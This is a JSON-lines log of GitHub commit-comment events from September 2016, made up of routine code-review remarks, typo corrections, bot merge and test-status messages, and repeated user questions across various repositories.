{"id":"4523944436","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18918839,"position":null,"line":null,"path":null,"commit_id":"56ca553f92dbbb5b508dc1665003d6b751c68fc1","created_at":"2016-09-06T21:14:14Z","updated_at":"2016-09-06T21:14:14Z","body":"merging basho/yokozuna/fd-tls-tag = 56ca553f into borshop-integration-674-fd-tls-tag"}},"created_at":"2016-09-06T21:14:14Z"}
{"id":"4523944467","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18918840,"position":null,"line":null,"path":null,"commit_id":"56ca553f92dbbb5b508dc1665003d6b751c68fc1","created_at":"2016-09-06T21:14:14Z","updated_at":"2016-09-06T21:14:14Z","body":"basho/yokozuna/fd-tls-tag = 56ca553f merged ok, testing candidate = c22d33e8"}},"created_at":"2016-09-06T21:14:14Z"}
{"id":"4523946594","type":"CommitCommentEvent","actor":{"login":"jakecraige"},"repo":{"name":"AliSoftware/Reusable"},"payload":{"comment":{"id":18918847,"position":42,"line":409,"path":"README.md","commit_id":"d6b1de9f7969a5f243f67a889c7cb98b9829bd91","created_at":"2016-09-06T21:14:36Z","updated_at":"2016-09-06T21:14:36Z","body":"s/StoryboardBasd/StoryboardBased/"}},"created_at":"2016-09-06T21:14:36Z"}
{"id":"4523947385","type":"CommitCommentEvent","actor":{"login":"jhendrixMSFT"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18918850,"position":12,"line":12,"path":"dotnetexec.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-06T21:14:45Z","updated_at":"2016-09-06T21:14:45Z","body":"Good points, and I forgot that I did get dotnet.exe working when running from the shared framework directory.  How do we want to make available the location of the host?  We could emit its absolute path to a text file then read it in via wrapper scripts, doesn't work all that great for msbuild-based tasks though unless there's a trick I'm overlooking."}},"created_at":"2016-09-06T21:14:45Z"}
{"id":"4523947704","type":"CommitCommentEvent","actor":{"login":"CreeperSeth"},"repo":{"name":"UnraveledMC-Dev/UnraveledMCMod"},"payload":{"comment":{"id":18918851,"position":null,"line":null,"path":null,"commit_id":"3cd23e416af689c52480eb292d03245203d042fd","created_at":"2016-09-06T21:14:49Z","updated_at":"2016-09-06T21:14:49Z","body":"Oops! Forgot to actually change that! Thanks!"}},"created_at":"2016-09-06T21:14:49Z"}
{"id":"4523948016","type":"CommitCommentEvent","actor":{"login":"dinosaadeh"},"repo":{"name":"dinosaadeh/Barjis"},"payload":{"comment":{"id":18918852,"position":11,"line":178,"path":"core/src/com/smb215team/barjis/game/GameController.java","commit_id":"3476027b4139814f16d2201585311c14b5047f66","created_at":"2016-09-06T21:14:52Z","updated_at":"2016-09-06T21:14:52Z","body":"@najidagher  I beg you let the code be clear and easy to read. I know it means nothing to you but it does to me.\r\n```\r\n{\r\n     dice.position.x = diceContainerLeft.borderLeft.x + 0.25f;\r\n     dice.velocity.x = dice.velocity.x /3 ;\r\n}\r\n```"}},"created_at":"2016-09-06T21:14:52Z"}
{"id":"4523949468","type":"CommitCommentEvent","actor":{"login":"jakecraige"},"repo":{"name":"AliSoftware/Reusable"},"payload":{"comment":{"id":18918856,"position":62,"line":431,"path":"README.md","commit_id":"d6b1de9f7969a5f243f67a889c7cb98b9829bd91","created_at":"2016-09-06T21:15:11Z","updated_at":"2016-09-06T21:15:11Z","body":"Whoops, we now need an \"s\" on work, so \"It demonstrates how `Reusable` works\""}},"created_at":"2016-09-06T21:15:11Z"}
{"id":"4523951047","type":"CommitCommentEvent","actor":{"login":"mfonville"},"repo":{"name":"opengapps/opengapps"},"payload":{"comment":{"id":18918861,"position":null,"line":null,"path":null,"commit_id":"d2413c21b682dd211b85962979ebb56c9b6eb6fd","created_at":"2016-09-06T21:15:25Z","updated_at":"2016-09-06T21:15:25Z","body":":-) I got word from MrBanks about it (see also the aosp_build thread)"}},"created_at":"2016-09-06T21:15:25Z"}
{"id":"4523951678","type":"CommitCommentEvent","actor":{"login":"huerlisi"},"repo":{"name":"panter/mykonote-app"},"payload":{"comment":{"id":18918862,"position":null,"line":null,"path":null,"commit_id":"76b2ca9bf9377bfa748973a2cf32ad1c2c46ca11","created_at":"2016-09-06T21:15:31Z","updated_at":"2016-09-06T21:15:31Z","body":"Very nice!"}},"created_at":"2016-09-06T21:15:31Z"}
{"id":"4523953474","type":"CommitCommentEvent","actor":{"login":"J-Suts"},"repo":{"name":"J-Suts/HistoryoftheCalculator"},"payload":{"comment":{"id":18918864,"position":null,"line":null,"path":null,"commit_id":"3cd970e90b87d1c89d1ccbcc622543c7f489daf2","created_at":"2016-09-06T21:15:49Z","updated_at":"2016-09-06T21:15:49Z","body":"Missed image tag. Two are in the code"}},"created_at":"2016-09-06T21:15:49Z"}
{"id":"4523967465","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18918890,"position":null,"line":null,"path":null,"commit_id":"5486bf810fccbb2c2aebcdaf49da0d8373353107","created_at":"2016-09-06T21:18:26Z","updated_at":"2016-09-06T21:18:26Z","body":"Ok, thought I think that in case of function we can at least check the result, while object constructor \"never fails\", but that is not a big deal for me here.\r\nI'll push commit in a few (ten) minutes."}},"created_at":"2016-09-06T21:18:26Z"}
{"id":"4523970284","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18918900,"position":null,"line":null,"path":null,"commit_id":"fd95e858fda90723c6cd5032f46b43c46e1e5800","created_at":"2016-09-06T21:19:02Z","updated_at":"2016-09-06T21:19:02Z","body":"I've got the feeling that the pos.give_threat() function could be rewritten and made much shorter to get a more elegant patch, if necessary. Good luck with your testing :)"}},"created_at":"2016-09-06T21:19:02Z"}
{"id":"4523970667","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18918902,"position":null,"line":null,"path":null,"commit_id":"fd95e858fda90723c6cd5032f46b43c46e1e5800","created_at":"2016-09-06T21:19:07Z","updated_at":"2016-09-06T21:19:07Z","body":"I've got the feeling that the pos.give_threat() function could be rewritten and made much shorter to get a more elegant patch, if necessary. Good luck with your testing :)"}},"created_at":"2016-09-06T21:19:07Z"}
{"id":"4523982877","type":"CommitCommentEvent","actor":{"login":"fbaumgardt"},"repo":{"name":"fbaumgardt/perseids-annotator"},"payload":{"comment":{"id":18918925,"position":null,"line":null,"path":null,"commit_id":"f2b839910ff5ca665b59e67fd0d679d2ca2849e2","created_at":"2016-09-06T21:21:35Z","updated_at":"2016-09-06T21:21:35Z","body":"Fixes #10"}},"created_at":"2016-09-06T21:21:35Z"}
{"id":"4523983333","type":"CommitCommentEvent","actor":{"login":"IjzerenHein"},"repo":{"name":"IjzerenHein/react-native-firestack"},"payload":{"comment":{"id":18918927,"position":null,"line":null,"path":null,"commit_id":"3ddc98005c27e0e80bff753a8cd3c795c3c8aec8","created_at":"2016-09-06T21:21:41Z","updated_at":"2016-09-06T21:21:41Z","body":"- Android\r\n- Sourcemaps (js + native-function for loading the source-map file)\r\n- Capture of console.log\r\n- Configuration (auto-enable?, dev/release?)"}},"created_at":"2016-09-06T21:21:41Z"}
{"id":"4523983400","type":"CommitCommentEvent","actor":{"login":"fbaumgardt"},"repo":{"name":"fbaumgardt/perseids-annotator"},"payload":{"comment":{"id":18918928,"position":null,"line":null,"path":null,"commit_id":"f2b839910ff5ca665b59e67fd0d679d2ca2849e2","created_at":"2016-09-06T21:21:42Z","updated_at":"2016-09-06T21:21:42Z","body":"Fixes #10"}},"created_at":"2016-09-06T21:21:42Z"}
{"id":"4523983505","type":"CommitCommentEvent","actor":{"login":"basz"},"repo":{"name":"ifsnop/mysqldump-php"},"payload":{"comment":{"id":18918930,"position":null,"line":null,"path":null,"commit_id":"3e69d2bbae1ecb2fa1cb88d7dcc03e6ec7aae12c","created_at":"2016-09-06T21:21:43Z","updated_at":"2016-09-06T21:21:43Z","body":"`geomtrycollection` looks like a typo? should be `geometrycollection`"}},"created_at":"2016-09-06T21:21:43Z"}
{"id":"4523984331","type":"CommitCommentEvent","actor":{"login":"IjzerenHein"},"repo":{"name":"IjzerenHein/react-native-firestack"},"payload":{"comment":{"id":18918934,"position":null,"line":null,"path":null,"commit_id":"3ddc98005c27e0e80bff753a8cd3c795c3c8aec8","created_at":"2016-09-06T21:21:53Z","updated_at":"2016-09-06T21:21:53Z","body":"- Android\r\n- Sourcemaps (js + native-function for loading the source-map file)\r\n- Capture of console.log\r\n- Configuration (auto-enable?, dev/release?)"}},"created_at":"2016-09-06T21:21:53Z"}
{"id":"4523991572","type":"CommitCommentEvent","actor":{"login":"IjzerenHein"},"repo":{"name":"IjzerenHein/react-native-firestack"},"payload":{"comment":{"id":18918964,"position":null,"line":null,"path":null,"commit_id":"3ddc98005c27e0e80bff753a8cd3c795c3c8aec8","created_at":"2016-09-06T21:23:24Z","updated_at":"2016-09-06T21:23:24Z","body":"- Android\r\n- Sourcemaps (js + native-function for loading the source-map file)\r\n- Capture of console.log\r\n- Configuration (auto-enable?, dev/release?)"}},"created_at":"2016-09-06T21:23:24Z"}
{"id":"4523993247","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18918973,"position":null,"line":null,"path":null,"commit_id":"5486bf810fccbb2c2aebcdaf49da0d8373353107","created_at":"2016-09-06T21:23:43Z","updated_at":"2016-09-06T21:23:43Z","body":"Notice, that we can not remove static keyword, because debug message handler can not be a non-static class member (must fit follow signature:)\r\n```cpp\r\ntypedef void (*QtMessageHandler)(QtMsgType, const QMessageLogContext &, const QString &);\r\n```\r\n\r\nand it need to access to the dbus debug interface and previous handler."}},"created_at":"2016-09-06T21:23:43Z"}
{"id":"4523995042","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18918980,"position":null,"line":null,"path":null,"commit_id":"7fc62097d63e2945fe8a951403a0856e957a0a45","created_at":"2016-09-06T21:24:08Z","updated_at":"2016-09-06T21:24:08Z","body":"you forgot your newline!!!"}},"created_at":"2016-09-06T21:24:08Z"}
{"id":"4523995521","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18918986,"position":null,"line":null,"path":null,"commit_id":"7fc62097d63e2945fe8a951403a0856e957a0a45","created_at":"2016-09-06T21:24:13Z","updated_at":"2016-09-06T21:24:13Z","body":"you forgot your newline!!!"}},"created_at":"2016-09-06T21:24:13Z"}
{"id":"4524005398","type":"CommitCommentEvent","actor":{"login":"cyberguznet"},"repo":{"name":"jyacot/soporte"},"payload":{"comment":{"id":18919020,"position":null,"line":null,"path":null,"commit_id":"2b68c80f2acd2536f79272e9cdbd6fbbd8567f8c","created_at":"2016-09-06T21:26:10Z","updated_at":"2016-09-06T21:26:10Z","body":"Un favor, el script de la base de datos esta en blanco, será? que lo actualiza?"}},"created_at":"2016-09-06T21:26:10Z"}
{"id":"4524005591","type":"CommitCommentEvent","actor":{"login":"cyberguznet"},"repo":{"name":"jyacot/soporte"},"payload":{"comment":{"id":18919023,"position":null,"line":null,"path":null,"commit_id":"2b68c80f2acd2536f79272e9cdbd6fbbd8567f8c","created_at":"2016-09-06T21:26:12Z","updated_at":"2016-09-06T21:26:12Z","body":"Un favor, el script de la base de datos esta en blanco, será? que lo actualiza?"}},"created_at":"2016-09-06T21:26:12Z"}
{"id":"4524007190","type":"CommitCommentEvent","actor":{"login":"cyberguznet"},"repo":{"name":"jyacot/soporte"},"payload":{"comment":{"id":18919033,"position":null,"line":null,"path":null,"commit_id":"2b68c80f2acd2536f79272e9cdbd6fbbd8567f8c","created_at":"2016-09-06T21:26:31Z","updated_at":"2016-09-06T21:26:31Z","body":"Un favor, el script de la base de datos esta en blanco, será? que lo actualiza?"}},"created_at":"2016-09-06T21:26:31Z"}
{"id":"4524007461","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18919035,"position":null,"line":null,"path":null,"commit_id":"56ca553f92dbbb5b508dc1665003d6b751c68fc1","created_at":"2016-09-06T21:26:34Z","updated_at":"2016-09-06T21:26:34Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-yokozuna/builds/1914\n"}},"created_at":"2016-09-06T21:26:34Z"}
{"id":"4524009457","type":"CommitCommentEvent","actor":{"login":"rabbah"},"repo":{"name":"openwhisk/openwhisk"},"payload":{"comment":{"id":18919042,"position":null,"line":null,"path":null,"commit_id":"a392ec983fd2602b4746b37f3d38bcf40556cbc2","created_at":"2016-09-06T21:27:00Z","updated_at":"2016-09-06T21:27:00Z","body":"typo: ` +            val fullActioName = s\"/$guestNamespace/$samplePackage/$sampleAction\" ` in same test, creating assets not necessary (test should fail with misuse code not not found). "}},"created_at":"2016-09-06T21:27:00Z"}
{"id":"4524009840","type":"CommitCommentEvent","actor":{"login":"rabbah"},"repo":{"name":"openwhisk/openwhisk"},"payload":{"comment":{"id":18919046,"position":null,"line":null,"path":null,"commit_id":"a392ec983fd2602b4746b37f3d38bcf40556cbc2","created_at":"2016-09-06T21:27:05Z","updated_at":"2016-09-06T21:27:05Z","body":"typo: ` +            val fullActioName = s\"/$guestNamespace/$samplePackage/$sampleAction\" ` in same test, creating assets not necessary (test should fail with misuse code not not found). "}},"created_at":"2016-09-06T21:27:05Z"}
{"id":"4524010878","type":"CommitCommentEvent","actor":{"login":"rabbah"},"repo":{"name":"openwhisk/openwhisk"},"payload":{"comment":{"id":18919056,"position":null,"line":null,"path":null,"commit_id":"a392ec983fd2602b4746b37f3d38bcf40556cbc2","created_at":"2016-09-06T21:27:18Z","updated_at":"2016-09-06T21:27:18Z","body":"typo: ` +            val fullActioName = s\"/$guestNamespace/$samplePackage/$sampleAction\" ` in same test, creating assets not necessary (test should fail with misuse code not not found). "}},"created_at":"2016-09-06T21:27:18Z"}
{"id":"4524010947","type":"CommitCommentEvent","actor":{"login":"rabbah"},"repo":{"name":"openwhisk/openwhisk"},"payload":{"comment":{"id":18919058,"position":null,"line":null,"path":null,"commit_id":"a392ec983fd2602b4746b37f3d38bcf40556cbc2","created_at":"2016-09-06T21:27:19Z","updated_at":"2016-09-06T21:27:19Z","body":"typo: ` +            val fullActioName = s\"/$guestNamespace/$samplePackage/$sampleAction\" ` in same test, creating assets not necessary (test should fail with misuse code not not found). "}},"created_at":"2016-09-06T21:27:19Z"}
{"id":"4524011102","type":"CommitCommentEvent","actor":{"login":"rabbah"},"repo":{"name":"openwhisk/openwhisk"},"payload":{"comment":{"id":18919059,"position":null,"line":null,"path":null,"commit_id":"a392ec983fd2602b4746b37f3d38bcf40556cbc2","created_at":"2016-09-06T21:27:20Z","updated_at":"2016-09-06T21:27:20Z","body":"typo: ` +            val fullActioName = s\"/$guestNamespace/$samplePackage/$sampleAction\" ` in same test, creating assets not necessary (test should fail with misuse code not not found). "}},"created_at":"2016-09-06T21:27:20Z"}
{"id":"4524011932","type":"CommitCommentEvent","actor":{"login":"cyberguznet"},"repo":{"name":"jyacot/soporte"},"payload":{"comment":{"id":18919063,"position":null,"line":null,"path":null,"commit_id":"2b68c80f2acd2536f79272e9cdbd6fbbd8567f8c","created_at":"2016-09-06T21:27:29Z","updated_at":"2016-09-06T21:27:29Z","body":"Un favor, el script de la base de datos esta en blanco, será? que lo actualiza?"}},"created_at":"2016-09-06T21:27:29Z"}
{"id":"4524016594","type":"CommitCommentEvent","actor":{"login":"ahmedbodi"},"repo":{"name":"bitcoinclassic/bitcoinclassic"},"payload":{"comment":{"id":18919077,"position":null,"line":null,"path":null,"commit_id":"e79a8dfeef145343741725ccbafff513beb4b99c","created_at":"2016-09-06T21:28:26Z","updated_at":"2016-09-06T21:28:26Z","body":"And the files removed by this commit are then re-included where?"}},"created_at":"2016-09-06T21:28:26Z"}
{"id":"4524017003","type":"CommitCommentEvent","actor":{"login":"ahmedbodi"},"repo":{"name":"bitcoinclassic/bitcoinclassic"},"payload":{"comment":{"id":18919078,"position":null,"line":null,"path":null,"commit_id":"e79a8dfeef145343741725ccbafff513beb4b99c","created_at":"2016-09-06T21:28:30Z","updated_at":"2016-09-06T21:28:30Z","body":"And the files removed by this commit are then re-included where?"}},"created_at":"2016-09-06T21:28:30Z"}
{"id":"4524017270","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18919081,"position":null,"line":null,"path":null,"commit_id":"2bd33399bbb700f677108ce25bc475fdbbe4d102","created_at":"2016-09-06T21:28:33Z","updated_at":"2016-09-06T21:28:33Z","body":"did #26"}},"created_at":"2016-09-06T21:28:33Z"}
{"id":"4524023100","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18919108,"position":null,"line":null,"path":null,"commit_id":"5486bf810fccbb2c2aebcdaf49da0d8373353107","created_at":"2016-09-06T21:29:47Z","updated_at":"2016-09-06T21:29:47Z","body":"Basically I didn't make it to be a class, because DebugInterface class should be a singleton (so expected to has a protected constructor), but we're trying to use it for RAII."}},"created_at":"2016-09-06T21:29:47Z"}
{"id":"4524032634","type":"CommitCommentEvent","actor":{"login":"Bmay531"},"repo":{"name":"Bmay531/Alpha"},"payload":{"comment":{"id":18919128,"position":4,"line":10,"path":"app/src/main/res/layout/activity_display_message.xml","commit_id":"dcf930da8e91ca6f1594b3cde0c9f837d6040b2f","created_at":"2016-09-06T21:31:33Z","updated_at":"2016-09-06T21:31:33Z","body":"fix\r\n"}},"created_at":"2016-09-06T21:31:33Z"}
{"id":"4524035090","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18919134,"position":null,"line":null,"path":null,"commit_id":"56b8c37001bde4107b9b73a8c4000d2dceaa0a99","created_at":"2016-09-06T21:31:57Z","updated_at":"2016-09-06T21:31:57Z","body":"did #3"}},"created_at":"2016-09-06T21:31:57Z"}
{"id":"4524036681","type":"CommitCommentEvent","actor":{"login":"julioapc16"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919139,"position":null,"line":null,"path":null,"commit_id":"887de65992d5b424c584afcd6e72da77faf85a68","created_at":"2016-09-06T21:32:14Z","updated_at":"2016-09-06T21:32:14Z","body":"Friend makes a version HENkaku-Android for android 2.3.6?\r\n"}},"created_at":"2016-09-06T21:32:14Z"}
{"id":"4524037205","type":"CommitCommentEvent","actor":{"login":"julioapc16"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919140,"position":null,"line":null,"path":null,"commit_id":"887de65992d5b424c584afcd6e72da77faf85a68","created_at":"2016-09-06T21:32:20Z","updated_at":"2016-09-06T21:32:20Z","body":"Friend makes a version HENkaku-Android for android 2.3.6?\r\n"}},"created_at":"2016-09-06T21:32:20Z"}
{"id":"4524037865","type":"CommitCommentEvent","actor":{"login":"julioapc16"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919141,"position":null,"line":null,"path":null,"commit_id":"887de65992d5b424c584afcd6e72da77faf85a68","created_at":"2016-09-06T21:32:26Z","updated_at":"2016-09-06T21:32:26Z","body":"Friend makes a version HENkaku-Android for android 2.3.6?\r\n"}},"created_at":"2016-09-06T21:32:26Z"}
{"id":"4524038213","type":"CommitCommentEvent","actor":{"login":"julioapc16"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919142,"position":null,"line":null,"path":null,"commit_id":"887de65992d5b424c584afcd6e72da77faf85a68","created_at":"2016-09-06T21:32:29Z","updated_at":"2016-09-06T21:32:29Z","body":"Friend makes a version HENkaku-Android for android 2.3.6?\r\n"}},"created_at":"2016-09-06T21:32:29Z"}
{"id":"4524038307","type":"CommitCommentEvent","actor":{"login":"julioapc16"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919143,"position":null,"line":null,"path":null,"commit_id":"887de65992d5b424c584afcd6e72da77faf85a68","created_at":"2016-09-06T21:32:30Z","updated_at":"2016-09-06T21:32:30Z","body":"Friend makes a version HENkaku-Android for android 2.3.6?\r\n"}},"created_at":"2016-09-06T21:32:30Z"}
{"id":"4524041203","type":"CommitCommentEvent","actor":{"login":"julioapc16"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919153,"position":null,"line":null,"path":null,"commit_id":"887de65992d5b424c584afcd6e72da77faf85a68","created_at":"2016-09-06T21:33:01Z","updated_at":"2016-09-06T21:33:01Z","body":"Friend makes a version HENkaku-Android for android 2.3.6?\r\n"}},"created_at":"2016-09-06T21:33:01Z"}
{"id":"4524041345","type":"CommitCommentEvent","actor":{"login":"julioapc16"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919154,"position":null,"line":null,"path":null,"commit_id":"887de65992d5b424c584afcd6e72da77faf85a68","created_at":"2016-09-06T21:33:02Z","updated_at":"2016-09-06T21:33:02Z","body":"Friend makes a version HENkaku-Android for android 2.3.6?\r\n"}},"created_at":"2016-09-06T21:33:02Z"}
{"id":"4524041422","type":"CommitCommentEvent","actor":{"login":"julioapc16"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919155,"position":null,"line":null,"path":null,"commit_id":"887de65992d5b424c584afcd6e72da77faf85a68","created_at":"2016-09-06T21:33:03Z","updated_at":"2016-09-06T21:33:03Z","body":"Friend makes a version HENkaku-Android for android 2.3.6?\r\n"}},"created_at":"2016-09-06T21:33:03Z"}
{"id":"4524041420","type":"CommitCommentEvent","actor":{"login":"Bmay531"},"repo":{"name":"Bmay531/Alpha"},"payload":{"comment":{"id":18919156,"position":8,"line":12,"path":"app/src/main/java/com/example/alpha/MainActivity.java","commit_id":"dcf930da8e91ca6f1594b3cde0c9f837d6040b2f","created_at":"2016-09-06T21:33:04Z","updated_at":"2016-09-06T21:33:04Z","body":"Instantiated to string"}},"created_at":"2016-09-06T21:33:04Z"}
{"id":"4524041491","type":"CommitCommentEvent","actor":{"login":"julioapc16"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919157,"position":null,"line":null,"path":null,"commit_id":"887de65992d5b424c584afcd6e72da77faf85a68","created_at":"2016-09-06T21:33:05Z","updated_at":"2016-09-06T21:33:05Z","body":"Friend makes a version HENkaku-Android for android 2.3.6?\r\n"}},"created_at":"2016-09-06T21:33:05Z"}
{"id":"4524042913","type":"CommitCommentEvent","actor":{"login":"Dwaynekj"},"repo":{"name":"openfin/fin-hypergrid"},"payload":{"comment":{"id":18919161,"position":37,"line":665,"path":"src/dataModels/JSON.js","commit_id":"391d6ea35e16a5279092de87a81abf257c38ba84","created_at":"2016-09-06T21:33:20Z","updated_at":"2016-09-06T21:33:20Z","body":"Understood. Discussed in person. "}},"created_at":"2016-09-06T21:33:20Z"}
{"id":"4524043253","type":"CommitCommentEvent","actor":{"login":"mwitchwilliams"},"repo":{"name":"gearvrf/GearVRf-Tests"},"payload":{"comment":{"id":18919163,"position":null,"line":null,"path":null,"commit_id":"4eb55daf2bc52721f29091ad942959f1fb6cb89f","created_at":"2016-09-06T21:33:23Z","updated_at":"2016-09-06T21:33:23Z","body":"GearVRf-DCO-1.0-Signed-off-by: Mitch Williams \r\nm1.williams@partner.samsung.com"}},"created_at":"2016-09-06T21:33:23Z"}
{"id":"4524043706","type":"CommitCommentEvent","actor":{"login":"julioapc16"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919165,"position":null,"line":null,"path":null,"commit_id":"887de65992d5b424c584afcd6e72da77faf85a68","created_at":"2016-09-06T21:33:29Z","updated_at":"2016-09-06T21:33:29Z","body":"Friend makes a version HENkaku-Android for android 2.3.6?\r\n"}},"created_at":"2016-09-06T21:33:29Z"}
{"id":"4524043796","type":"CommitCommentEvent","actor":{"login":"julioapc16"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919166,"position":null,"line":null,"path":null,"commit_id":"887de65992d5b424c584afcd6e72da77faf85a68","created_at":"2016-09-06T21:33:29Z","updated_at":"2016-09-06T21:33:29Z","body":"Friend makes a version HENkaku-Android for android 2.3.6?\r\n"}},"created_at":"2016-09-06T21:33:29Z"}
{"id":"4524043838","type":"CommitCommentEvent","actor":{"login":"julioapc16"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919167,"position":null,"line":null,"path":null,"commit_id":"887de65992d5b424c584afcd6e72da77faf85a68","created_at":"2016-09-06T21:33:30Z","updated_at":"2016-09-06T21:33:30Z","body":"Friend makes a version HENkaku-Android for android 2.3.6?\r\n"}},"created_at":"2016-09-06T21:33:30Z"}
{"id":"4524043851","type":"CommitCommentEvent","actor":{"login":"julioapc16"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919168,"position":null,"line":null,"path":null,"commit_id":"887de65992d5b424c584afcd6e72da77faf85a68","created_at":"2016-09-06T21:33:30Z","updated_at":"2016-09-06T21:33:30Z","body":"Friend makes a version HENkaku-Android for android 2.3.6?\r\n"}},"created_at":"2016-09-06T21:33:30Z"}
{"id":"4524043865","type":"CommitCommentEvent","actor":{"login":"julioapc16"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919169,"position":null,"line":null,"path":null,"commit_id":"887de65992d5b424c584afcd6e72da77faf85a68","created_at":"2016-09-06T21:33:30Z","updated_at":"2016-09-06T21:33:30Z","body":"Friend makes a version HENkaku-Android for android 2.3.6?\r\n"}},"created_at":"2016-09-06T21:33:30Z"}
{"id":"4524043971","type":"CommitCommentEvent","actor":{"login":"julioapc16"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919170,"position":null,"line":null,"path":null,"commit_id":"887de65992d5b424c584afcd6e72da77faf85a68","created_at":"2016-09-06T21:33:31Z","updated_at":"2016-09-06T21:33:31Z","body":"Friend makes a version HENkaku-Android for android 2.3.6?\r\n"}},"created_at":"2016-09-06T21:33:31Z"}
{"id":"4524044524","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18919172,"position":null,"line":null,"path":null,"commit_id":"1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf","created_at":"2016-09-06T21:33:37Z","updated_at":"2016-09-06T21:33:37Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1757 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.72%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.88%25-green.svg)</a>\n"}},"created_at":"2016-09-06T21:33:37Z"}
{"id":"4524046842","type":"CommitCommentEvent","actor":{"login":"julioapc16"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919176,"position":null,"line":null,"path":null,"commit_id":"887de65992d5b424c584afcd6e72da77faf85a68","created_at":"2016-09-06T21:34:02Z","updated_at":"2016-09-06T21:34:02Z","body":"Friend makes a version HENkaku-Android for android 2.3.6?\r\n"}},"created_at":"2016-09-06T21:34:02Z"}
{"id":"4524046972","type":"CommitCommentEvent","actor":{"login":"julioapc16"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919179,"position":null,"line":null,"path":null,"commit_id":"887de65992d5b424c584afcd6e72da77faf85a68","created_at":"2016-09-06T21:34:04Z","updated_at":"2016-09-06T21:34:04Z","body":"Friend makes a version HENkaku-Android for android 2.3.6?\r\n"}},"created_at":"2016-09-06T21:34:04Z"}
{"id":"4524047081","type":"CommitCommentEvent","actor":{"login":"julioapc16"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919180,"position":null,"line":null,"path":null,"commit_id":"887de65992d5b424c584afcd6e72da77faf85a68","created_at":"2016-09-06T21:34:06Z","updated_at":"2016-09-06T21:34:06Z","body":"Friend makes a version HENkaku-Android for android 2.3.6?\r\n"}},"created_at":"2016-09-06T21:34:06Z"}
{"id":"4524047111","type":"CommitCommentEvent","actor":{"login":"julioapc16"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919181,"position":null,"line":null,"path":null,"commit_id":"887de65992d5b424c584afcd6e72da77faf85a68","created_at":"2016-09-06T21:34:06Z","updated_at":"2016-09-06T21:34:06Z","body":"Friend makes a version HENkaku-Android for android 2.3.6?\r\n"}},"created_at":"2016-09-06T21:34:06Z"}
